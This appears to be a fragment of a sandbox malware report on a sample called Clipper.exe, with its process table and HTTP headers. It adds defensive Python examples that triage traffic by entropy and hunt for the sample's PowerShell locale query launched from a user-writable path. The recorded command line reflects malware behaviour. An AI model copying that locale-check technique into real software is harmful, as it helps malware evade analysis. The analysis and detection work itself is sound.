                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
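
The traffic rows above use the report's flattened layout (timestamp, byte count, direction, payload): the 16384-byte outbound chunks appear only as a short hex preview, and the 389-byte inbound row is the header block of an HTTP/1.1 200 response that announces a 1272-byte JSON body. The Python below is an added example, not part of the Joe Sandbox report or code from the sample, showing how to parse rows in that layout and triage them: a byte-entropy reading separates opaque (TLS-encrypted) uploads from readable protocol text, a preview shorter than the declared byte count is flagged as truncated, and a response whose Content-Length is not carried in the row is flagged so the analyst goes looking for the body. The row regex, the 7.0 bits/byte threshold and the sample rows (deterministic pseudo-random bytes standing in for the real ciphertext) are this example's assumptions.

```python
import hashlib
import math
import re
from typing import Dict, List, Optional

# Row layout of the flattened traffic table (assumed from the report text):
#   "<date> <time> UTC<bytes><IN|OUT>Data Raw: <hex ...>"   binary chunk, hex preview
#   "<date> <time> UTC<bytes><IN|OUT><HTTP start line>"     text chunk, headers follow
# A "Data Ascii:" line repeats the hex lossily and is ignored.
ROW_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) UTC"
    r"(?P<size>\d+)(?P<dir>IN|OUT)(?P<body>.*)$"
)
OPAQUE_BITS = 7.0  # assumed triage threshold, bits per byte

def parse_rows(text: str) -> List[Dict]:
    """Split the flattened table into records; hex previews become bytes."""
    rows: List[Dict] = []
    current: Optional[Dict] = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            body = m.group("body")
            current = {"ts": m.group("ts"), "size": int(m.group("size")),
                       "dir": m.group("dir"), "raw": b"", "text": []}
            if body.startswith("Data Raw:"):
                current["raw"] = bytes.fromhex(body[len("Data Raw:"):].strip())
            else:
                current["text"].append(body)
            rows.append(current)
        elif line.startswith("Data Ascii:"):
            continue
        elif current is not None:
            current["text"].append(line)  # continuation line (HTTP header)
    return rows

def payload_bytes(rec: Dict) -> bytes:
    """Bytes the entropy reading is taken over: the hex preview, or the text as sent."""
    return rec["raw"] or "\r\n".join(rec["text"]).encode()

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 8 for ciphertext or compressed data, 4 to 5 for ASCII protocol text."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_http(rec: Dict) -> Optional[Dict]:
    """Start line plus a lower-cased header map for a text record, None for binary ones."""
    if not rec["text"]:
        return None
    headers = {}
    for h in rec["text"][1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": rec["text"][0], "headers": headers}

def triage(rows: List[Dict]) -> List[str]:
    """Findings an analyst checks first: opaque uploads, truncated previews, bodies not shown."""
    findings = []
    for r in rows:
        tag = f"{r['ts']} {r['dir']} {r['size']}B"
        bits = shannon_entropy(payload_bytes(r))
        if r["raw"]:
            if bits > OPAQUE_BITS:
                findings.append(f"{tag}: opaque payload at {bits:.2f} bits/byte, consistent with TLS application data")
            if len(r["raw"]) < r["size"]:
                findings.append(f"{tag}: hex preview truncated, {len(r['raw'])} of {r['size']} bytes shown")
        else:
            http = parse_http(r)
            length = int(http["headers"].get("content-length", "0"))
            if length:
                findings.append(f"{tag}: {http['start']}, {length}-byte body announced but not carried in this row")
    return findings

# Constructed sample rows in the report's layout (not the real capture above):
# 512 deterministic pseudo-random bytes stand in for a TLS record preview.
_FAKE_TLS = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))
SAMPLE = "\n".join([
    "2024-06-01 16:46:58 UTC16384OUTData Raw: " + " ".join(f"{b:02x}" for b in _FAKE_TLS),
    "Data Ascii: " + "".join(chr(b) for b in _FAKE_TLS if 32 <= b < 127),
    "2024-06-01 16:46:59 UTC389INHTTP/1.1 200 OK",
    "Server: nginx/1.18.0",
    "Content-Type: application/json",
    "Content-Length: 1272",
    "Connection: close",
])

if __name__ == "__main__":
    for finding in triage(parse_rows(SAMPLE)):
        print(finding)
```

The entropy reading is a triage heuristic, not proof of encryption: compressed images and packed binaries score just as high, and the report preview covers only the first few hundred bytes of each 16384-byte record, so take the measurement over a full pcap where one is available.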


                      Target ID:0
                      Start time:12:46:43
                      Start date:01/06/2024
                      Path:C:\Users\user\Desktop\Clipper.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\Clipper.exe"
                      Imagebase:0x7ff6c6490000
                      File size:2'269'184 bytes
                      MD5 hash:A0A3146B324C02ED258E040E035BCEC2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:12:46:44
                      Start date:01/06/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                      Imagebase:0x7ff7be880000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:12:46:44
                      Start date:01/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true
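
The process table shows Clipper.exe launching powershell.exe with -NoProfile -NonInteractive -NoLogo and the command Get-Culture | Select -ExpandProperty DisplayName, which returns the display name of the current culture. The report does not say what the sample does with the result; reading it as a locale check of the kind stealers use to decide whether to run is my inference, not a finding of the report. The Python below is an added hunting example, not Joe Sandbox output or code from the sample: it scores Sysmon Event ID 1 style process-creation records (constructed here; the first mirrors the parent/child pair above) and flags a culture query launched from a user-writable path, decoding a Base64/UTF-16LE -EncodedCommand payload first so the same logic catches the encoded form. The field names, the user-writable path list, and the benign, encoded and conhost records are assumptions of this example.

```python
import base64
import re
from typing import Dict, List

# Sysmon Event ID 1 style records, constructed for this example. The first
# mirrors the parent/child pair in the process table above; the rest are
# assumed: a benign console use, an encoded variant, and the conhost child.
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": '"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command '
                    '"[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; '
                    'Get-Culture | Select -ExpandProperty DisplayName"',
     "ParentImage": r"C:\Users\user\Desktop\Clipper.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": '"powershell.exe" -Command "Get-Process | Sort-Object CPU"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -NonInteractive -EncodedCommand "
                    + base64.b64encode("Get-Culture | Select -ExpandProperty DisplayName"
                                       .encode("utf-16-le")).decode(),
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\update.exe"},
    {"Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

# Assumed list of locations an unprivileged user can write to; tune per environment.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
# -e, -ec, -enc and -encodedcommand are all accepted by powershell.exe.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
AUTOMATION_FLAGS = {"-noprofile", "-nop", "-noninteractive", "-noni", "-nologo"}
LOCALE_CMDLETS = ("get-culture", "get-winsystemlocale", "get-winuserlanguagelist")

def normalize(cmdline: str) -> str:
    """Lower-case the command line and append a decoded -EncodedCommand payload
    (Base64 of UTF-16LE text), so encoded and plain forms match the same checks."""
    text = cmdline.lower()
    m = ENCODED_RE.search(cmdline)
    if m:
        try:
            text += " " + base64.b64decode(m.group(1)).decode("utf-16-le").lower()
        except (ValueError, UnicodeDecodeError):
            pass  # malformed blob: keep what we have, the encoded flag still counts
    return text

def score_event(ev: Dict[str, str]) -> Dict:
    """Indicators matched by one process-creation event, plus a verdict."""
    hits: List[str] = []
    if not ev["Image"].lower().endswith("\\powershell.exe"):
        return {"suspicious": False, "hits": hits}
    cmd = normalize(ev["CommandLine"])
    if any(c in cmd for c in LOCALE_CMDLETS):
        hits.append("locale query")
    if AUTOMATION_FLAGS & set(cmd.split()):
        hits.append("profile-less or non-interactive invocation")
    if ENCODED_RE.search(ev["CommandLine"]):
        hits.append("encoded command")
    if any(p in ev["ParentImage"].lower() for p in USER_WRITABLE):
        hits.append("parent in user-writable path")
    # Automation flags alone are everyday admin noise; the locale probe
    # launched from a user-writable parent is the combination worth an alert.
    suspicious = "locale query" in hits and "parent in user-writable path" in hits
    return {"suspicious": suspicious, "hits": hits}

def hunt(events: List[Dict[str, str]]) -> List[Dict]:
    """Return the suspicious events with their matched indicators attached."""
    out = []
    for ev in events:
        verdict = score_event(ev)
        if verdict["suspicious"]:
            out.append({"ParentImage": ev["ParentImage"], "hits": verdict["hits"]})
    return out

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit["ParentImage"], "->", ", ".join(hit["hits"]))
```

Matching on Get-Culture alone would fire on ordinary administration scripts; the parent path is what separates the sample's call from those, so tune USER_WRITABLE to the environment. The conhost.exe child with -ForceV1 is spawned by any console process and is not an indicator on its own.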

                      No disassembly